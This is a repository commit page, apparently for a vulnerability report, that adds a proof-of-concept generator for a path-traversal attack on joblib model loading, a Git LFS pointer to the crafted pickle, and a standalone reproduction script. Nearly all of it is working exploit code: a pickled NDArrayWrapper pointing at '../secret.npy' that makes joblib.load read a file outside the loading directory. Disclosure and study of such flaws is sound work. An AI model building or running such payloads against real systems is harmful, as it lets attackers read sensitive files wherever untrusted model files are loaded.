CandyCaine committed
Commit e3c004c · verified · 1 Parent(s): 54b2587

Upload 2 files

Files changed (2)
  1. joblib_traversal.pkl +3 -0
  2. poc_joblib_gen.py +51 -0
joblib_traversal.pkl ADDED
@@ -0,0 +1,3 @@
+ version https://git-lfs.github.com/spec/v1
+ oid sha256:315758be5e6f7a00dc79348701ce614e217bf00f473d06e0e7fd706442097ab6
+ size 143
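
The pickle itself is stored through Git LFS, so only the pointer above (a SHA-256 oid and a byte count) lives in the repository. A locally generated payload can be checked against those pointer fields directly; a minimal sketch, with the caveat that pickle bytes are not guaranteed to be identical across Python, joblib, and numpy versions:

import hashlib

# Compare a locally generated payload against the Git LFS pointer fields above.
# Assumes joblib_traversal.pkl was produced by poc_joblib_gen.py in this directory.
with open("joblib_traversal.pkl", "rb") as f:
    blob = f.read()

print("size:", len(blob))                                # pointer says 143
print("oid sha256:", hashlib.sha256(blob).hexdigest())   # compare with the oid above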
poc_joblib_gen.py ADDED
@@ -0,0 +1,51 @@
+
+ import os
+ import pickle
+ import joblib
+ import numpy as np
+ from joblib.numpy_pickle_compat import NDArrayWrapper
+
+ def generate_exploit():
+     print("[*] Generating Joblib Path Traversal Payload...")
+
+     # 1. Targeted Traversal File
+     # In a real report, we claim we can read sensitive files relative to the model.
+     # We will target "../secret.npy"
+     target_path = "../secret.npy"
+
+     # 2. Craft Malicious Wrapper
+     # This wrapper tells joblib: "Verify my data is at ../secret.npy"
+     # When joblib reads this, it triggers the traversal.
+     malicious_wrapper = NDArrayWrapper(filename=target_path, subclass=np.ndarray)
+
+     filename = "joblib_traversal.pkl"
+     with open(filename, "wb") as f:
+         pickle.dump(malicious_wrapper, f)
+
+     print(f"[+] Malicious Pickle written to: {filename}")
+     print("\n[+] REPRODUCTION SCRIPT (Run this to Verify):")
+     print("-" * 50)
+     print("import joblib")
+     print("import numpy as np")
+     print("import os")
+     print("")
+     print("# Setup: Create a dummy secret file outside the load directory")
+     print("os.makedirs('safe_dir', exist_ok=True)")
+     print("secret_data = np.array([123, 456], dtype=np.int32)")
+     print("np.save('secret.npy', secret_data)")
+     print("")
+     print("# Move payload to safe_dir to simulate isolation")
+     print("if os.path.exists('joblib_traversal.pkl'):")
+     print("    os.replace('joblib_traversal.pkl', 'safe_dir/model.pkl')")
+     print("")
+     print("print('Attempting to load model from safe_dir...')")
+     print("# This should FAIL to find the file if secure, but SUCCEEDS if vulnerable")
+     print("try:")
+     print("    data = joblib.load('safe_dir/model.pkl')")
+     print("    print(f'[PWNED] Successfully read file outside safe_dir: {data}')")
+     print("except Exception as e:")
+     print("    print(e)")
+     print("-" * 50)
+
+ if __name__ == "__main__":
+     generate_exploit()
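
For convenience, the reproduction steps the generator prints can also be saved as a standalone script. The sketch below collects that same printed sequence into one runnable file; as the PoC's comments describe, the NDArrayWrapper filename is resolved relative to the directory containing the pickle, which is what lets the ../ component escape safe_dir:

import os
import joblib
import numpy as np

# Setup: create a dummy secret file outside the load directory.
os.makedirs('safe_dir', exist_ok=True)
secret_data = np.array([123, 456], dtype=np.int32)
np.save('secret.npy', secret_data)

# Move the payload into safe_dir to simulate isolation.
if os.path.exists('joblib_traversal.pkl'):
    os.replace('joblib_traversal.pkl', 'safe_dir/model.pkl')

print('Attempting to load model from safe_dir...')
# This should FAIL to find the file if secure, but SUCCEEDS if vulnerable.
try:
    data = joblib.load('safe_dir/model.pkl')
    print(f'[PWNED] Successfully read file outside safe_dir: {data}')
except Exception as e:
    print(e)

On a vulnerable load, this prints the contents of secret.npy even though only safe_dir/model.pkl was passed to joblib.load; if the relative path were confined to safe_dir, the load would fail and the exception branch would fire instead.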